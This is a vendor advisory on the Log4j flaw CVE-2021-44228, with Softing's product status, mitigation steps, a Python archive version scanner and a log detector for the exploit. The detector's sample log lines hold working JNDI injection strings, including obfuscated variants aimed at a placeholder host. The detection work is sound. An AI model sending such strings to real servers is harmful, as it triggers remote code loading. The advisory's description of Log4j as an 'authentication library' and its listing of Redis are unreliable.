Critical vulnerability in Log4j (CVE-2021-44228)
The German Federal Office for Information Security (BSI) has raised its warning for the log4j Authentication Library (CVE-2021-44228) to level red, the highest alert level. Our customers have asked whether various Softing products are affected.
The vulnerability is present in all applications that embed Log4j (versions 2.0 to 2.14.1) for their audit logging feature. This is mainly the Apache stack, but also applications such as Elasticsearch, Redis, etc.
The vulnerability is exploited by forcing an application to log a specific string, which causes the vulnerable system to download and run a malicious script from an attacker-controlled domain. According to security researchers, apps and services across the globe are already being actively scanned for vulnerable versions of Log4j by malicious actors.
Affected Products (as of 12/16/2021)
Confirmed affected products
- Customer-specific products of Softing Automotive Electronics have been updated
Confirmed not affected products
- All generally available products of Softing Automotive Electronics
- All Softing Industrial Automation products
- All Softing IT Networks products
Products not listed are under investigation
- Focus on internet-connected systems first
- Check whether a system is running Log4j version 2.0 to 2.14.1 (2.15 was supposed to fix the problem, but introduced a new Denial of Service problem)
- For non-Softing products, contact your system or software vendor to validate whether log4j is in use and whether any additional actions are required
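One way to carry out the version check in the steps above, as an added example that is not Softing's own tool: the script scans JAR/WAR/EAR files (including JARs nested inside them, as a WAR bundles its libraries) for the Maven pom.properties file that log4j-core ships under META-INF, reads the version line, and classifies it against the 2.0 to 2.14.1 range named in this advisory, with 2.15 reported separately because of the Denial of Service problem mentioned above. It also reports whether the JndiLookup class is present in the archive. The build_sample_archive helper and the archive names it produces are constructed for the demonstration; the two META-INF and class paths are the ones log4j-core uses.

```python
"""Scan JAR/WAR/EAR files for embedded Log4j 2.x in the affected range.

Added example, not Softing's tool. log4j-core carries a Maven
pom.properties file inside the JAR; its version line is a reliable marker
even when the JAR file itself has been renamed or repackaged.
"""
import io
import re
import sys
import zipfile
from pathlib import Path

POM_PATH = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")

# Range named in the advisory: 2.0 up to and including 2.14.1.
AFFECTED_MIN = (2, 0, 0)
AFFECTED_MAX = (2, 14, 1)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0' -> (2, 0, 0). Qualifiers such as -rc1 are ignored."""
    nums = tuple(int(p) for p in re.findall(r"\d+", text)[:3])
    return nums + (0,) * (3 - len(nums))


def classify(version):
    """Map a log4j-core version string to the advisory's categories."""
    v = parse_version(version)
    if AFFECTED_MIN <= v <= AFFECTED_MAX:
        return "affected"
    if v == (2, 15, 0):
        return "dos-issue"  # advisory: 2.15 fixed this CVE but added a DoS problem
    return "not-affected"  # 1.x, or newer than the advisory's range


def scan_archive_bytes(data, name):
    """Return findings for one archive held in memory, recursing into nested JARs."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = set(zf.namelist())
    if POM_PATH in names:
        props = zf.read(POM_PATH).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        version = m.group(1).strip() if m else "unknown"
        findings.append({"archive": name, "version": version,
                         "status": classify(version) if m else "unknown",
                         "jndi_lookup_present": JNDI_CLASS in names})
    elif JNDI_CLASS in names:
        # log4j-core repackaged without its Maven metadata (shaded/fat JAR)
        findings.append({"archive": name, "version": "unknown",
                         "status": "unknown", "jndi_lookup_present": True})
    for entry in sorted(names):
        if entry.lower().endswith(ARCHIVE_SUFFIXES):
            findings.extend(scan_archive_bytes(zf.read(entry), f"{name}!{entry}"))
    return findings


def scan_path(root):
    """Scan a single archive or every archive below a directory."""
    root = Path(root)
    paths = [root] if root.is_file() else root.rglob("*")
    findings = []
    for p in paths:
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            findings.extend(scan_archive_bytes(p.read_bytes(), str(p)))
    return findings


def build_sample_archive(version, nested_as=None, with_jndi=True):
    """Constructed sample archive for offline demonstration (not a real log4j JAR).

    With nested_as set (e.g. "WEB-INF/lib/log4j-core.jar"), the sample JAR is
    wrapped inside an outer archive the way a WAR bundles its libraries.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PATH, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"")
    data = buf.getvalue()
    if nested_as is None:
        return data
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr(nested_as, data)
    return outer.getvalue()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for f in scan_path(target):
        print(f"{f['status']:<13} {f['version']:<8} jndi_lookup={f['jndi_lookup_present']} {f['archive']}")
```

Run it against an application directory (python scan_log4j.py /opt/app) and follow up on every "affected", "dos-issue" or "unknown" line; an "unknown" with jndi_lookup=True is a repackaged log4j-core whose version has to be established from the vendor. The scan only sees Log4j shipped inside archives on disk; a vendor statement is still needed for products whose files you cannot inspect, as the advisory says.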
For affected systems
- Check whether a system may be compromised
- If you have network monitoring tools in place, implement suitable rules to detect potential attacks
- If you identify a compromised system, report it to the respective Security Officer or IT manager and consider disconnecting it from the network
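For the monitoring-rule step above, as an added example that is not Softing's code: a small detector that runs over web-server access log lines and flags the JNDI lookup strings used to trigger this vulnerability. Because Log4j expands nested ${...} lookups before the JNDI lookup runs, a rule that matches only the literal "${jndi:" prefix misses lines where the keyword is assembled from ${lower:...} or ${...:-...} pieces; the detector collapses that nesting first and then matches. The sample log lines, the client addresses and the example.invalid hostname are constructed for the demonstration.

```python
"""Flag log lines carrying Log4j JNDI lookup strings (CVE-2021-44228).

Added example, not Softing's code. Log4j expands nested ${...} lookups
before the JNDI lookup runs, so a rule matching only the literal "${jndi:"
misses lines where the keyword is assembled from ${lower:...} or
${...:-...} pieces. The detector undoes that nesting first, then matches.
"""
import re

# ${lower:j} / ${upper:J} -> "j" (case is irrelevant, matching is case-insensitive)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${env:UNSET:-j} / ${::-j} -> "j": an unresolvable lookup falls back to its default
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The lookup shape itself: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Collapse nested lookups, innermost first, until nothing changes."""
    for _ in range(max_rounds):
        collapsed = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        collapsed = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi(line):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan_lines(lines):
    """Return (line number, scheme) for every line that should raise an alert."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((number, scheme))
    return hits


# Constructed access-log lines (combined log format); example.invalid is a
# reserved name and the client addresses are private-range placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [16/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [16/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:r}mi://example.invalid/b}"',
    '10.0.0.9 - - [16/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}ndi:dns://example.invalid/c}"',
    '10.0.0.7 - - [16/Dec/2021:10:00:05 +0000] "GET /${version} HTTP/1.1" 404 0 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for number, scheme in scan_lines(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme} -> alert")
```

A hit records an attempt, not a confirmed compromise: whether it succeeded depends on the Log4j version the receiving application runs and on whether that host was able to reach the named server. For the "check whether a system may be compromised" step, pair the hits with the host's outbound connection logs (LDAP, RMI or DNS traffic to the hostname in the lookup around the same timestamp) and with the version check. The last sample line, a plain "${version}" path, is there to show that the rule does not alert on every "${" it sees.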